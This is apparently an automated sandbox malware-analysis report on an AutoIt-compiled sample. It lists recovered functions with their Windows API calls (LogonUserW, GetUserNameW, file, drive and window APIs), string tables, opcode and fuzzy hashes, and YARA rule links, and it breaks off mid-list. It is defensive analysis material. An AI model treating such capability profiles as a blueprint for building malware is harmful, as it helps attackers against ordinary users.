                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: mouse_event
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2434400541-0
                                                                                                                                                                      • Opcode ID: c7fe2f589fcc40a26a8951830aacf17e37ce4eb7992e5ce51a499eb566b8ec51
                                                                                                                                                                      • Instruction ID: b27e6e59be4554f89cc8a43e591f69f70b326ee502f9acc9ec0868c63e7489ac
                                                                                                                                                                      • Opcode Fuzzy Hash: c7fe2f589fcc40a26a8951830aacf17e37ce4eb7992e5ce51a499eb566b8ec51
                                                                                                                                                                      • Instruction Fuzzy Hash: 90D05EB31642053FFC2A4B20BC0FF76020CE340781F85498B320189AE1D8F16824E034
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C8C93, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,003C88D1), ref: 003C8CB3
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LogonUser
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1244722697-0
                                                                                                                                                                      • Opcode ID: 696a11616861e63d315967aaa6af07afa2c87b09263b6a12ae6d4b0912d0d133
                                                                                                                                                                      • Instruction ID: 102add71320b44bf74d5788316c093dfdd18d0c03659475fa4ca43cd619f9595
                                                                                                                                                                      • Opcode Fuzzy Hash: 696a11616861e63d315967aaa6af07afa2c87b09263b6a12ae6d4b0912d0d133
                                                                                                                                                                      • Instruction Fuzzy Hash: 66D05E3226050EAFEF018EA4DC01EBE3B69EB04B01F408111FE15C50A1C775D835EB60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003B2230, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 003B2242
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: NameUser
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2645101109-0
                                                                                                                                                                      • Opcode ID: 44374c8ab4fc788e36ac8b8f36827307f182e2e02197814702d34d56c1d44b4d
                                                                                                                                                                      • Instruction ID: 4fd4b86ed7f70381a6618218cc1d467bff3857ea3cf48220c735919444cbae11
                                                                                                                                                                      • Opcode Fuzzy Hash: 44374c8ab4fc788e36ac8b8f36827307f182e2e02197814702d34d56c1d44b4d
                                                                                                                                                                      • Instruction Fuzzy Hash: 6DC04CF1810109DBDB06DB90D998DFE77BCAB04304F104055A501F2500DB749B44CE71
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E7B1B, Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 003E7B70
                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 003E7B82
                                                                                                                                                                      • DestroyWindow.USER32 ref: 003E7B90
                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 003E7BAA
                                                                                                                                                                      • GetWindowRect.USER32 ref: 003E7BB1
                                                                                                                                                                      • SetRect.USER32 ref: 003E7CF2
                                                                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 003E7D02
                                                                                                                                                                      • CreateWindowExW.USER32 ref: 003E7D4A
                                                                                                                                                                      • GetClientRect.USER32 ref: 003E7D56
                                                                                                                                                                      • CreateWindowExW.USER32 ref: 003E7D90
                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003E7DB2
                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003E7DC5
                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003E7DD0
                                                                                                                                                                      • GlobalLock.KERNEL32 ref: 003E7DD9
                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003E7DE8
                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003E7DF1
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003E7DF8
                                                                                                                                                                      • GlobalFree.KERNEL32 ref: 003E7E03
                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003E7E15
                                                                                                                                                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00402CAC,00000000), ref: 003E7E2B
                                                                                                                                                                      • GlobalFree.KERNEL32 ref: 003E7E3B
                                                                                                                                                                      • CopyImage.USER32 ref: 003E7E61
                                                                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 003E7E80
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003E7EA2
                                                                                                                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003E808F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                      • API String ID: 2211948467-2373415609
                                                                                                                                                                      • Opcode ID: 8218c5a1fb4f68394931e056c3595e51750d879452b7c38c11fd09ef5f4c4e17
                                                                                                                                                                      • Instruction ID: bfcca24e6f00d85fd05454b50a43b3ff9a71a9f3bd183190b1773d7ad99f424a
                                                                                                                                                                      • Opcode Fuzzy Hash: 8218c5a1fb4f68394931e056c3595e51750d879452b7c38c11fd09ef5f4c4e17
                                                                                                                                                                      • Instruction Fuzzy Hash: E1027C71900115AFDF16DFA5CC89EAE7BBDEF48310F118669F905AB2A1CB74AD01CB60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F37F3, Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CharUpperBuffW.USER32(?,?,003FF910), ref: 003F38AF
                                                                                                                                                                      • IsWindowVisible.USER32 ref: 003F38D3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BuffCharUpperVisibleWindow
                                                                                                                                                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                                                      • API String ID: 4105515805-45149045
                                                                                                                                                                      • Opcode ID: 1e6dc92f500bc62d5ee7fc63c15ea74f6d882eb7737ad858ef510a5140e10d56
                                                                                                                                                                      • Instruction ID: 17515b4f7b243e5243d19df937b75d31968b3b328a7a71ea6e2f634a99207d3f
                                                                                                                                                                      • Opcode Fuzzy Hash: 1e6dc92f500bc62d5ee7fc63c15ea74f6d882eb7737ad858ef510a5140e10d56
                                                                                                                                                                      • Instruction Fuzzy Hash: D1D18E302043099FCB16EF14C495B7A77A5EF94354F11846DB9869F3A2CB35EE4ACB81
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003FA849, Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 003FA89F
                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 003FA8D0
                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 003FA8DC
                                                                                                                                                                      • SetBkColor.GDI32(?,000000FF), ref: 003FA8F6
                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 003FA905
                                                                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 003FA930
                                                                                                                                                                      • GetSysColor.USER32(00000010), ref: 003FA938
                                                                                                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 003FA93F
                                                                                                                                                                      • FrameRect.USER32 ref: 003FA94E
                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 003FA955
                                                                                                                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 003FA9A0
                                                                                                                                                                      • FillRect.USER32 ref: 003FA9D2
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 003FA9FD
                                                                                                                                                                        • Part of subcall function 003FAB60: GetSysColor.USER32(00000012), ref: 003FAB99
                                                                                                                                                                        • Part of subcall function 003FAB60: SetTextColor.GDI32(?,?), ref: 003FAB9D
                                                                                                                                                                        • Part of subcall function 003FAB60: GetSysColorBrush.USER32(0000000F), ref: 003FABB3
                                                                                                                                                                        • Part of subcall function 003FAB60: GetSysColor.USER32(0000000F), ref: 003FABBE
                                                                                                                                                                        • Part of subcall function 003FAB60: GetSysColor.USER32(00000011), ref: 003FABDB
                                                                                                                                                                        • Part of subcall function 003FAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 003FABE9
                                                                                                                                                                        • Part of subcall function 003FAB60: SelectObject.GDI32(?,00000000), ref: 003FABFA
                                                                                                                                                                        • Part of subcall function 003FAB60: SetBkColor.GDI32(?,00000000), ref: 003FAC03
                                                                                                                                                                        • Part of subcall function 003FAB60: SelectObject.GDI32(?,?), ref: 003FAC10
                                                                                                                                                                        • Part of subcall function 003FAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 003FAC2F
                                                                                                                                                                        • Part of subcall function 003FAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003FAC46
                                                                                                                                                                        • Part of subcall function 003FAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 003FAC5B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4124339563-0
                                                                                                                                                                      • Opcode ID: 7d23aed751c987cf8170be1573cee689694e4b036a760240413483ba2242f2db
                                                                                                                                                                      • Instruction ID: c249c8ef3bd085ab91ad60f35ac53e7be939f50995ef297cacfceb90da9c0329
                                                                                                                                                                      • Opcode Fuzzy Hash: 7d23aed751c987cf8170be1573cee689694e4b036a760240413483ba2242f2db
                                                                                                                                                                      • Instruction Fuzzy Hash: 77A1AFB2008705BFDB129F64DC08E7B7BADFF89321F104A29FA66961A0D771D944CB52
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00372C18, Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • DestroyWindow.USER32(?,?,?), ref: 00372CA2
                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00372CE8
                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00372CF3
                                                                                                                                                                      • DestroyIcon.USER32(00000000,?,?,?), ref: 00372CFE
                                                                                                                                                                      • DestroyWindow.USER32(00000000,?,?,?), ref: 00372D09
                                                                                                                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 003AC68B
                                                                                                                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 003AC6C4
                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 003ACAED
                                                                                                                                                                        • Part of subcall function 00371B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00372036,?,00000000,?,?,?,?,003716CB,00000000,?), ref: 00371B9A
                                                                                                                                                                      • SendMessageW.USER32(?,00001053), ref: 003ACB2A
                                                                                                                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 003ACB41
                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 003ACB57
                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 003ACB62
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                                                                      • String ID: 0
                                                                                                                                                                      • API String ID: 464785882-4108050209
                                                                                                                                                                      • Opcode ID: b54892379544614b263e2ad6e38aa43f200428be3e8dc407aded8a28f0f7fa7c
                                                                                                                                                                      • Instruction ID: 6b60ed46953e003d3a27d54c4ae998c2755a517a272bece276a61d4a85ab35d6
                                                                                                                                                                      • Opcode Fuzzy Hash: b54892379544614b263e2ad6e38aa43f200428be3e8dc407aded8a28f0f7fa7c
                                                                                                                                                                      • Instruction Fuzzy Hash: 6412AF30614202EFDB23CF24C984BAAB7E9FF16300F559569E899DB662C735EC41CB91
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E77BE, Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • DestroyWindow.USER32(00000000), ref: 003E77F1
                                                                                                                                                                      • SystemParametersInfoW.USER32 ref: 003E78B0
                                                                                                                                                                      • SetRect.USER32 ref: 003E78EE
                                                                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 003E7900
                                                                                                                                                                      • CreateWindowExW.USER32 ref: 003E7946
                                                                                                                                                                      • GetClientRect.USER32 ref: 003E7952
                                                                                                                                                                      • CreateWindowExW.USER32 ref: 003E7996
                                                                                                                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 003E79A5
                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 003E79B5
                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 003E79B9
                                                                                                                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 003E79C9
                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003E79D2
                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 003E79DB
                                                                                                                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?,?,50000000), ref: 003E7A07
                                                                                                                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 003E7A1E
                                                                                                                                                                      • CreateWindowExW.USER32 ref: 003E7A59
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 003E7A6D
                                                                                                                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 003E7A7E
                                                                                                                                                                      • CreateWindowExW.USER32 ref: 003E7AAE
                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 003E7AB9
                                                                                                                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 003E7AC4
                                                                                                                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 003E7ACE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                      • API String ID: 2910397461-517079104
                                                                                                                                                                      • Opcode ID: 09808efed58543f88ce143543a68da529e5d73817b0bd47e7bc4f68471ba4dfe
                                                                                                                                                                      • Instruction ID: 2dfb6cebd25e48844cc1af29be0243ae6a03229d39afd8982dc2ee4de9e3d839
                                                                                                                                                                      • Opcode Fuzzy Hash: 09808efed58543f88ce143543a68da529e5d73817b0bd47e7bc4f68471ba4dfe
                                                                                                                                                                      • Instruction Fuzzy Hash: B5A16F71A40215BFEB159FA4DC4AFAB7BADEF44710F018264FA14AB2E0C774AD00CB64
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003DAF7B, Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 003DAF89
                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?,003FFAC0,?,\\.\,003FF910), ref: 003DB066
                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,003FFAC0,?,\\.\,003FF910), ref: 003DB1C4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorMode$DriveType
                                                                                                                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                      • API String ID: 2907320926-4222207086
                                                                                                                                                                      • Opcode ID: 78fa035ff9184b331ea523f22e495482b62aa19e074372ec9b7a36f5761fce28
                                                                                                                                                                      • Instruction ID: 9bdafafb59e3252195d6c81ce9cd42c7063199cf18d1bc250caa5f739bf6e16c
                                                                                                                                                                      • Opcode Fuzzy Hash: 78fa035ff9184b331ea523f22e495482b62aa19e074372ec9b7a36f5761fce28
                                                                                                                                                                      • Instruction Fuzzy Hash: 3B51C172780205EBCB12DB10F992A7DF3B5AB543417728027E81BAB790C778DD11DB4A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00376A3C, Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __wcsnicmp
                                                                                                                                                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                                      • API String ID: 1038674560-86951937
                                                                                                                                                                      • Opcode ID: aa37a47adce51610c5fb919116888f0ba2ce6ac03fdb20d4df2aa103c3089d6c
                                                                                                                                                                      • Instruction ID: 811cd7ffb51d3afb012601db48a6ec90b6b90d0ae6d3daf58731c92c75cb3e4c
                                                                                                                                                                      • Opcode Fuzzy Hash: aa37a47adce51610c5fb919116888f0ba2ce6ac03fdb20d4df2aa103c3089d6c
                                                                                                                                                                      • Instruction Fuzzy Hash: E28118B1600605BBCB33AB60CD93FAE7798EF12700F048025FD49AE1C2EB69DA55C295
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F9C8B, Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 003F9D41
                                                                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 003F9DFA
                                                                                                                                                                      • SendMessageW.USER32(?,00001102,00000002,?), ref: 003F9E16
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$Window
                                                                                                                                                                      • String ID: 0
                                                                                                                                                                      • API String ID: 2326795674-4108050209
                                                                                                                                                                      • Opcode ID: 474e8ce12814d5e2e47f20f6659c80d3ffc739ca4f3b196d0cbb922757736afb
                                                                                                                                                                      • Instruction ID: bca3b1e89c775e27b916cd270190bfe011a8f4402abd2356215bc77ebe3913da
                                                                                                                                                                      • Opcode Fuzzy Hash: 474e8ce12814d5e2e47f20f6659c80d3ffc739ca4f3b196d0cbb922757736afb
                                                                                                                                                                      • Instruction Fuzzy Hash: CD02F370108709AFD716CF14C848BBABBE8FF49354F05892DFA99D62A1CB35D844CB52
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003FAB60, Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSysColor.USER32(00000012), ref: 003FAB99
                                                                                                                                                                      • SetTextColor.GDI32(?,?), ref: 003FAB9D
                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 003FABB3
                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 003FABBE
                                                                                                                                                                      • CreateSolidBrush.GDI32(?), ref: 003FABC3
                                                                                                                                                                      • GetSysColor.USER32(00000011), ref: 003FABDB
                                                                                                                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 003FABE9
                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 003FABFA
                                                                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 003FAC03
                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 003FAC10
